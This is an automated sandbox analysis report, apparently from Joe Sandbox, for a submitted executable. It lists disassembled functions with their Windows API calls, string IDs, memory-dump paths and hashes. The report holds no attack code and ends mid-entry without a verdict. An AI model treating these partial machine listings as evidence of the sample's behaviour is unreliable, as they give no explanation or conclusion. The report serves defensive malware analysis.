                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDevice$Release
                                                                          • String ID:
                                                                          • API String ID: 1035833867-0
                                                                          • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                          • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                          • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                          • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                          Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __getptd.LIBCMT ref: 0041708E
                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                          • __amsg_exit.LIBCMT ref: 004170AE
                                                                          • __lock.LIBCMT ref: 004170BE
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                          • _free.LIBCMT ref: 004170EE
                                                                          • InterlockedIncrement.KERNEL32(009C2CE0), ref: 00417106
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                          • String ID:
                                                                          • API String ID: 3470314060-0
                                                                          • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                          • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                          • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                          • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                          Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                            • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3495660284-0
                                                                          • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                          • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                          • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                          • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                          Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual
                                                                          • String ID:
                                                                          • API String ID: 4278518827-0
                                                                          • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                          • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                          • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                          • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                          Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                          • String ID:
                                                                          • API String ID: 442100245-0
                                                                          • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                          • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                          • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                          • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                          Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                          • _wcslen.LIBCMT ref: 0045F94A
                                                                          • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                          • String ID: 0
                                                                          • API String ID: 621800784-4108050209
                                                                          • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                          • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                          • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                          • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                          Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SetErrorMode.KERNEL32 ref: 004781CE
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                          • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                          • String ID: \VH
                                                                          • API String ID: 3884216118-234962358
                                                                          • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                          • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                          • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                          • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                          Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                          • IsMenu.USER32(?), ref: 0044854D
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                          • DrawMenuBar.USER32 ref: 004485AF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                          • String ID: 0
                                                                          • API String ID: 3076010158-4108050209
                                                                          • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                          • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                          • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                          • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                          Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                          • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_memmove_wcslen
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1589278365-1403004172
                                                                          • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                          • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                          • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                          • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                          Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Handle
                                                                          • String ID: nul
                                                                          • API String ID: 2519475695-2873401336
                                                                          • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                          • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                          • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                          • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                          Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Handle
                                                                          • String ID: nul
                                                                          • API String ID: 2519475695-2873401336
                                                                          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                          Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcsncpy.LIBCMT ref: 00401C41
                                                                          • _wcscpy.LIBCMT ref: 00401C5D
                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                          • String ID: Line:
                                                                          • API String ID: 1874344091-1585850449
                                                                          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                          Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: SysAnimate32
                                                                          • API String ID: 0-1011021900
                                                                          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                          Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                          • GetFocus.USER32 ref: 0046157B
                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                          • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                          • __swprintf.LIBCMT ref: 00461608
                                                                          Strings
                                                                          Memory Dump Source
